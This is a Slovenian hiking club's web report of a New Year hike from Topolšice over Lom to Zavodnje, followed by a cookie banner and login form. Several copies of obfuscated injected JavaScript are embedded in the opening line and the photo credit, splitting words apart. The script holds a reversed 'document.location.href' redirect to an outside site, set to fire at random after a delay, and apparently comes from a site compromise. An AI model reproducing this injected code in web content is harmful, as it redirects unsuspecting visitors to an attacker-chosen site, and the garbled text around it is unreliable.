TRADICIONALNI ZIMSKI POHOD MINIL V ODLIČNEM VZDUŠJU

Tradicionalni pohod na Sleme preko Loma tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokrat ni potekal niti tradicionalno na Štefanovo niti po običajni poti. Zaradi slabega vremena, omejitev druženja in zaprtega Andrejevega doma na Slemenu smo se ga odločili izvesti na drugi novoletni dan ter v obliki krožne ture iz Topolšice v Zavodnje po pobočjih Loma, prehodom Strmine, čez Kozji hrbet do Gostišča pri Vidi v Zavodnjah, kjer smo spili čaj in kavo. V središču Zavodenj smo na Petrovem hribu opazili novo pridobitev (brunarico) in se jo odločili pogledati. Mimo nje smo se po cesti vrnili na planinsko pot in ji sledili do Kopina oz g. in ge. Hudobreznik nekoliko višje, ki sta nas prijazno pogostila z golažem, potico in pijačo. Po okrepčilu smo se preko serij gozdnih vlak spustili do Žlebnika in pot nadaljevali mimo Banka ter Ravsa na vrh Loma. Od tam je sledil samo še strm spust do našega izhodišča pri Gasilnem domu v Topolšici. Celoten pohod je trajal cca. 33.000 korakov, ure pa so minevale hitro zaradi dobre družbe.

Zapisal: Andrej Veternik

Fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: Borut Zajc, Jure Grudnik

 

 

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki